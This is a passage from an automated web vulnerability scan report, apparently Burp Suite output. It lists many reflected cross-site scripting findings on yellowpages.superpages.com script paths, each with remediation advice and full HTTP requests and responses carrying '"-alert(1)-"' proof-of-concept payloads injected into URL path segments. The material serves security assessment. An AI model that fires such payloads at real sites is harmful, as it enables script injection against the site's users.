The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20813"-alert(1)-"42f38a119fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js20813"-alert(1)-"42f38a119fb/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js20813&quot;-alert(1)-&quot;42f38a119fb/alertcommon.js
Server: Unspecified
Set-Cookie: JSESSIONID=1964063886F42A385D9BF560E5991661; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:37 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js20813"-alert(1)-"42f38a119fb/alertcommon.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.596. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/alertcommon.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c615e"-alert(1)-"fd5addf1395 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/alertcommon.jsc615e"-alert(1)-"fd5addf1395 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/alertcommon.jsc615e&quot;-alert(1)-&quot;fd5addf1395
Server: Unspecified
Set-Cookie: JSESSIONID=C42F1F43179B33DCF485D91863AA0026; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:44 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
owpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/alertcommon.jsc615e"-alert(1)-"fd5addf1395?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.597. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/browser_check.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae19"-alert(1)-"9957299e054 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonbae19"-alert(1)-"9957299e054/js/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonbae19&quot;-alert(1)-&quot;9957299e054/js/browser_check.js
Server: Unspecified
Set-Cookie: JSESSIONID=E09C44F1BBBAA213F4E42EF428D3F357; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:27 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonbae19"-alert(1)-"9957299e054/js/browser_check.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.598. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/browser_check.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67314"-alert(1)-"4d0383f1bcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js67314"-alert(1)-"4d0383f1bcf/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js67314&quot;-alert(1)-&quot;4d0383f1bcf/browser_check.js
Server: Unspecified
Set-Cookie: JSESSIONID=36F4629CEBB28C41CD456D4BA38FDE53; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:44 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js67314"-alert(1)-"4d0383f1bcf/browser_check.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.599. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/browser_check.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4823"-alert(1)-"6b96276b57d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/browser_check.jsb4823"-alert(1)-"6b96276b57d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/browser_check.jsb4823&quot;-alert(1)-&quot;6b96276b57d
Server: Unspecified
Set-Cookie: JSESSIONID=3F77784525870BE1A8C596BB0EA60651; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:51 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
pages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/browser_check.jsb4823"-alert(1)-"6b96276b57d?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.600. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/iepopup.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa65f"-alert(1)-"34ef4e6041c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonaa65f"-alert(1)-"34ef4e6041c/js/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonaa65f&quot;-alert(1)-&quot;34ef4e6041c/js/iepopup.js
Server: Unspecified
Set-Cookie: JSESSIONID=2134AC985409415C2A045A7FF6023BCE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:41 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonaa65f"-alert(1)-"34ef4e6041c/js/iepopup.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.601. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/iepopup.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7547e"-alert(1)-"e77ecaba831 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js7547e"-alert(1)-"e77ecaba831/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js7547e&quot;-alert(1)-&quot;e77ecaba831/iepopup.js
Server: Unspecified
Set-Cookie: JSESSIONID=BA40BC8F6A7DD188B47568ADA942F69A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:00 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js7547e"-alert(1)-"e77ecaba831/iepopup.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.602. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/iepopup.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57121"-alert(1)-"a019059d18b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/iepopup.js57121"-alert(1)-"a019059d18b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/iepopup.js57121&quot;-alert(1)-&quot;a019059d18b
Server: Unspecified
Set-Cookie: JSESSIONID=5FEE5F212D4C070AC3E37397025C1DA1; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:20 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/iepopup.js57121"-alert(1)-"a019059d18b?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.603. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12235"-alert(1)-"2aa4880554e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common12235"-alert(1)-"2aa4880554e/js/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common12235&quot;-alert(1)-&quot;2aa4880554e/js/jquery-1.4.2.min.js
Server: Unspecified
Set-Cookie: JSESSIONID=199509FE8D2800AF9160EA7047F290DD; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:44 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common12235"-alert(1)-"2aa4880554e/js/jquery-1.4.2.min.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.604. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e853"-alert(1)-"4df34621227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js6e853"-alert(1)-"4df34621227/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js6e853&quot;-alert(1)-&quot;4df34621227/jquery-1.4.2.min.js
Server: Unspecified
Set-Cookie: JSESSIONID=3139A329C5301E9058E04DFF871BCCF1; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:00 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js6e853"-alert(1)-"4df34621227/jquery-1.4.2.min.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.605. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c940"-alert(1)-"8d600cbb5e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery-1.4.2.min.js4c940"-alert(1)-"8d600cbb5e6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery-1.4.2.min.js4c940&quot;-alert(1)-&quot;8d600cbb5e6
Server: Unspecified
Set-Cookie: JSESSIONID=1640D122FA5011C752860F98D405C757; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:08 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
es.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js4c940"-alert(1)-"8d600cbb5e6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.606. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-plugins.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4138"-alert(1)-"d392b5225e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonf4138"-alert(1)-"d392b5225e3/js/jquery-plugins.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonf4138&quot;-alert(1)-&quot;d392b5225e3/js/jquery-plugins.js
Server: Unspecified
Set-Cookie: JSESSIONID=9572D1720D04456BA7DF5D05EB1798D8; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:40 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonf4138"-alert(1)-"d392b5225e3/js/jquery-plugins.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.607. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-plugins.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc582"-alert(1)-"51b3ea3bf60 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsdc582"-alert(1)-"51b3ea3bf60/jquery-plugins.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsdc582&quot;-alert(1)-&quot;51b3ea3bf60/jquery-plugins.js
Server: Unspecified
Set-Cookie: JSESSIONID=09CE7FF4251840525CF01CD53A9C9A17; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:59 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsdc582"-alert(1)-"51b3ea3bf60/jquery-plugins.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.608. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-plugins.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce99"-alert(1)-"1f8bcc299d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery-plugins.jsfce99"-alert(1)-"1f8bcc299d1 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery-plugins.jsfce99&quot;-alert(1)-&quot;1f8bcc299d1
Server: Unspecified
Set-Cookie: JSESSIONID=D2531DC67D815FBBB68818C02A80D6CB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:07 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
ages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery-plugins.jsfce99"-alert(1)-"1f8bcc299d1?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.609. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.history_remote.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39dde"-alert(1)-"ad48974274b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
